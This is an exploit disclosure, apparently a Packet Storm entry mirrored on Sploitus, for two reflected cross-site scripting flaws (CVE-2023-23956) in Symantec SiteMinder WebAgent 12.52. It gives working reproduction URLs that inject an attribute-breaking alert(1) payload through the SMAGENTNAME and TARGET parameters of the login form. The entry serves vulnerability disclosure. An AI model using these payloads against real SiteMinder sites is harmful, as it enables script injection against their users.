Share
## https://sploitus.com/exploit?id=PACKETSTORM:173038
Exploit Title: Symantec SiteMinder WebAgent v12.52 - Cross-site scripting (XSS)  
Google Dork: N/A  
Date: 18-06-2023  
Exploit Author: Harshit Joshi  
Vendor Homepage: https://community.broadcom.com/home  
Software Link: https://www.broadcom.com/products/identity/siteminder  
Version: 12.52  
Tested on: Linux, Windows  
CVE: CVE-2023-23956  
Security Advisory: https://support.broadcom.com/external/content/SecurityAdvisories/0/22221  
  
*Description:*  
I am writing to report two XSS vulnerabilities (CVE-2023-23956) that I have  
discovered in the Symantec SiteMinder WebAgent. The vulnerability is  
related to the improper handling of user input and has been assigned the  
Common Weakness Enumeration (CWE) code CWE-79. The CVSSv3 score for this  
vulnerability is 5.4.  
  
Vulnerability Details:  
---------------------  
*Impact:*  
  
This vulnerability allows an attacker to execute arbitrary JavaScript code  
in the context of the affected application.  
  
*Steps to Reproduce:*  
  
*First:*  
  
1) Visit -  
https://domain.com/siteminderagent/forms/login.fcc?TYPE=xyz&REALMOID=123&GUID=&SMAUTHREASON=0&METHOD=GET&SMAGENTNAME=-SM-%2F%22%20onfocus%3D%22alert%281%29%22%20autofocus%3D%22  
  
2) After visiting the above URL, click on the "*Change Password*" button,  
and the popup will appear.  
- The *SMAGENTNAME *parameter is the source of this vulnerability.  
*- Payload Used: **-SM-/" onfocus="alert(1)" autofocus="*  
  
*Second:*  
  
1) Visit -  
https://domain.com/siteminderagent/forms/login.fcc?TYPE=123&TARGET=-SM-%2F%22%20onfocus%3D%22alert%281%29%22%20autofocus%3D%22  
2) After visiting the above URL, click on the "*Change Password*" button,  
and the popup will appear.  
- The *TARGET *parameter is the source of this vulnerability.  
*- Payload Used: **-SM-/" onfocus="alert(1)" autofocus="*